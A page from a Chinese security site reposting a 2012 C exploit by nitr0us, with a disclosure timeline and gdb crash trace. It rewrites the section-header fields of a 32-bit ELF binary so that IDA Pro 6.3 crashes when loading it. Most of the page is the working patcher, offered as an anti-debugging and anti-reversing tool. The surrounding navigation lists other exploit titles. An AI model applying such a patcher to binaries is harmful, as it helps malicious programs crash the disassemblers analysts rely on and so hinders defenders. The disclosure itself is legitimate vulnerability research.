首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IDA Pro 6.3 ELF Anti-Debugging / Reversing Patcher
来源:http://twitter.com/nitr0usmx 作者:nitr0us 发布时间:2012-12-20  

/*
*
* IDA Pro 6.3 (crash due an internal error)
* ELF anti-debugging/reversing patcher
*
* Published @ IOActive Labs Research blog:
* http://blog.ioactive.com/2012/12/striking-back-gdb-and-ida-debuggers.html
*
* - nitr0us [ http://twitter.com/nitr0usmx ]
*
* Tested under:
* IDA Pro Starter License 6.3.120531 (Mac OS X)
* IDA Pro Demo            6.3.120730 (Ubuntu Linux 9.04)
* IDA Pro Demo            6.3.120730 (Mac OS X 10.7.3)
* IDA Pro Demo            6.3.120730 (Windows Vista Home Premium SP2)
*
* Bug found using Frixyon fuzzer (my ELF file format fuzzer still in development)
*
* Timeline:
* 21/11/2012    The bug was found on IDA Demo 6.3
* 22/11/2012    The bug was tested on IDA Pro Starter License 6.3.120531 (32-bit)
* 22/11/2012    The bug was reported through the official Hex-Rays contact emails
* 23/11/2012    Hex-Rays replied and agreed that the bug leads to an unrecoverable
*               state and it will be fixed on the next release
*
**************** TECHNICAL DETAILS ***********************
nitr0us@burial:~$ gdb -q idaq
(gdb) r a.out
(no debugging symbols found)

Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to Thread 0xb6860760 (LWP 3638)]
0xb55f7694 in default_notification_handler (reader=@0xbfbffae0,
    notif=reader_t::err_shstrndx) at reader.cpp:33
33      reader.cpp: No such file or directory.
        in reader.cpp
Current language:  auto; currently c++
(gdb)

The root cause of the problem is that there's no validation to
verify if e_shstrndx > e_shnum before referencing it.

**********************************************************
*
* [Compilation] $ gcc ida_63_elf_shield.c -o ida_63_elf_shield -Wall
*
* Sh0utz: IOActive fellows, CRAc, b33rc0n crew (dex, hkm, calderpwn,
*         Carlos Ayala, Daemon [Thanks for test it on IDA paid $$$],
*         LightOS) chr1x, alt3kx, tr3w, crypkey, el_chito, nahual, beck,
*         sirdarkcat, NataS, ran, Fede Bossi, nediam, psymera, Rolman,
*         Kbrown, Bucio, p4dm3, Hector Lopez, zeus, Matias Brutti,
*         sunl3vy, Raaka_elgaupo, vendetta, raito, beavis, el5patas,
*         vi0let.
*
*
* http://chatsubo-labs.blogspot.com
* http://www.brainoverflow.org
*
*/

#include <sys/mman.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <time.h>

#define EI_NIDENT       16
#define ELFCLASS32      1               /* 32-bit objects */
#define ELFDATA2LSB     1               /* 2's complement, little endian */

const char e_magic[4] = { 0x7f, 'E', 'L', 'F' };

typedef uint16_t Elf32_Half;
typedef uint32_t Elf32_Word;
typedef uint32_t Elf32_Addr;
typedef uint32_t Elf32_Off;

typedef struct
{
  unsigned char e_ident[EI_NIDENT];     /* Magic number and other info */
  Elf32_Half    e_type;                 /* Object file type */
  Elf32_Half    e_machine;              /* Architecture */
  Elf32_Word    e_version;              /* Object file version */
  Elf32_Addr    e_entry;                /* Entry point virtual address */
  Elf32_Off     e_phoff;                /* Program header table file offset */
  Elf32_Off     e_shoff;                /* Section header table file offset */
  Elf32_Word    e_flags;                /* Processor-specific flags */
  Elf32_Half    e_ehsize;               /* ELF header size in bytes */
  Elf32_Half    e_phentsize;            /* Program header table entry size */
  Elf32_Half    e_phnum;                /* Program header table entry count */
  Elf32_Half    e_shentsize;            /* Section header table entry size */
  Elf32_Half    e_shnum;                /* Section header table entry count */
  Elf32_Half    e_shstrndx;             /* Section header string table index */
} Elf32_Ehdr;

int isELF(int fd);

int main(int argc, char **argv)
{
 Elf32_Ehdr *header;
 Elf32_Half new_shnum;
 Elf32_Half new_shstrndx;
 int  fd;

 printf("######################################################\n");
 printf("#                                                    #\n");
 printf("# IDA Pro 6.3 - ELF anti-debugging/reversing patcher #\n");
 printf("#                      -nitr0us-                     #\n");
 printf("#                                                    #\n");
 printf("######################################################\n\n");

 if(argc < 2){
  fprintf(stderr, "Usage: %s <elf_file_to_patch>\n", argv[0]);
  exit(-1);
 }

 if((fd = open(argv[1], O_RDWR)) == -1){
  perror("open");
  exit(-1);
 }

 if(!isELF(fd)){
  close(fd);
  exit(-1);
 }

 // Mapping to memory only the necessary bytes [sizeof(header)]
 if((header = (Elf32_Ehdr *) mmap(NULL, sizeof(header), PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0)) == MAP_FAILED){
  perror("mmap");
  close(fd);
  exit(-1);
 }

 printf("[*] The ELF file originally has:\n");
 printf("[-] Ehdr->e_shnum:    %5d (0x%.4x)\n", header->e_shnum, header->e_shnum);
 printf("[-] Ehdr->e_shstrndx: %5d (0x%.4x)\n\n", header->e_shstrndx, header->e_shstrndx);

 printf("[*] Patching \"%s\" with new random() values...\n\n", argv[1]);

 srand(time(NULL)); // seed for rand()

 new_shnum    = (Elf32_Half) rand() % 0x1337;
 new_shstrndx = (Elf32_Half) 0;

 while(new_shstrndx < new_shnum)
  new_shstrndx = (Elf32_Half) rand() % 0xDEAD;

 header->e_shnum    = new_shnum;
 header->e_shstrndx = new_shstrndx;

 // Synchronize the ELF in file system with the previous memory mapped
 if(msync(NULL, 0, MS_SYNC) == -1){
  perror("msync");
  close(fd);
  exit(-1);
 }

 close(fd);
 munmap(header, 0);

 printf("[*] The patched ELF file now has:\n");
 printf("[+] Ehdr->e_shnum:    %5d (0x%.4x)\n", new_shnum, new_shnum);
 printf("[+] Ehdr->e_shstrndx: %5d (0x%.4x)\n\n", new_shstrndx, new_shstrndx);

 printf("[*] IDA Pro 6.3 should crash trying to load \"%s\"\n", argv[1]);

 return 0;
}

int isELF(int fd)
{
 Elf32_Ehdr header;

 if(read(fd, &header, sizeof(header)) == -1){
  perror("isELF(): read");
  return 0;
 }

 /* magic number verification */
 if(memcmp(header.e_ident, e_magic, 4) != 0){
  fprintf(stderr, "The argument given is not an ELF file !\n");
  return 0;
 }

 /* 32-bit class verification */
 if(header.e_ident[4] != ELFCLASS32){
  fprintf(stderr, "Only 32-bit ELF files supported !\n");
  return 0;
 }

 /* little-endian verification */
 if(header.e_ident[5] != ELFDATA2LSB){
  fprintf(stderr, "Only little-endian ELF files supported !\n");
  return 0;
 }

 return 1;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·EMC Avamar 6.1.100-402 File Ov
·GNU Debugger 7.5.1 NULL Pointe
·Microsoft Internet Explorer 9.
·SurgeFTP Remote Command Execut
·InduSoft Web Studio ISSymbol.o
·FireFly Mediaserver 1.0.0.1359
·Centrify Deployment Manager 2.
·4psa VoipNow 2.x Remote Comman
·Firefox 17.0.1 Crash Proof Of
·Sony PC Companion 2.1 WebServi
·Crystal Reports CrystalPrintCo
·Sony PC Companion 2.1 Load() U
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved